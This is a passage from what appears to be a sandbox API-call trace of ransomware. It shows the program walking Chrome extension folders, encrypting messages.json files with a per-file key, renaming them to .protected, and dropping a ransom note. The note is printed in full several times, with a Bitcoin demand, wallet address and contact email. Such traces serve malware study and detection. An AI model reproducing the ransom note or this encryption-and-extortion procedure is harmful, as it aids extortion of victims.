wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\RESTORE_FILES.txt") returned 159 [0080.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.563] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.563] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.563] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.563] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.563] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.563] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.563] CloseHandle (hObject=0x164) returned 1 [0080.563] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.564] lstrcmpiW (lpString1="km", lpString2="Windows") returned -1 [0080.564] lstrcmpiW (lpString1="km", lpString2="Program Files") returned -1 [0080.564] lstrcmpiW (lpString1="km", lpString2="Program Files (x86)") returned -1 [0080.564] lstrcmpiW (lpString1="km", lpString2="$Recycle.bin") returned 1 [0080.564] lstrcmpiW (lpString1="km", lpString2="System Volume Information") returned -1 [0080.564] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km") returned 141 [0080.564] lstrcmpW (lpString1="km", lpString2=".") returned 1 [0080.564] lstrcmpW (lpString1="km", lpString2="..") returned 1 [0080.564] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\*") returned 143 [0080.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.564] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.564] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.564] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.564] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.564] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.564] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\.") returned 143 [0080.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.564] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.564] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.564] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.564] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.564] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.564] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.564] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\..") returned 144 [0080.564] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.564] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.564] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.564] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.564] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json") returned 155 [0080.564] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.564] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.564] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.565] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.565] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json") returned 155 [0080.565] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.565] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json") returned 155 [0080.565] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.565] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json") returned 155 [0080.566] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.566] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x25f, lpOverlapped=0x0) returned 1 [0080.567] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffda1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.567] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x25f, lpOverlapped=0x0) returned 1 [0080.567] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.567] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.567] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.567] CloseHandle (hObject=0x168) returned 1 [0080.567] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.protected") returned 165 [0080.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.protected")) returned 1 [0080.568] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.568] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.568] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\RESTORE_FILES.txt") returned 159 [0080.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.568] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.568] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.569] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.569] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.569] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.569] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.569] CloseHandle (hObject=0x164) returned 1 [0080.569] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="Windows") returned -1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="Program Files") returned -1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="Program Files (x86)") returned -1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="$Recycle.bin") returned 1 [0080.569] lstrcmpiW (lpString1="kn", lpString2="System Volume Information") returned -1 [0080.569] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn") returned 141 [0080.569] lstrcmpW (lpString1="kn", lpString2=".") returned 1 [0080.569] lstrcmpW (lpString1="kn", lpString2="..") returned 1 [0080.569] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\*") returned 143 [0080.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.569] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.569] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.569] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.570] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.570] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.570] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\.") returned 143 [0080.570] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.570] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.570] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.570] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.570] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.570] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.570] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.570] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\..") returned 144 [0080.570] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.570] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.570] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.570] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.570] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json") returned 155 [0080.570] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.570] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.570] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.570] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.570] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json") returned 155 [0080.570] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.570] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json") returned 155 [0080.570] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.570] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json") returned 155 [0080.570] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.570] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x147, lpOverlapped=0x0) returned 1 [0080.571] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.571] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x147, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x147, lpOverlapped=0x0) returned 1 [0080.571] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.571] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.572] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.572] CloseHandle (hObject=0x168) returned 1 [0080.572] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.protected") returned 165 [0080.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.protected")) returned 1 [0080.572] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.572] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.572] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\RESTORE_FILES.txt") returned 159 [0080.572] CreateFileW 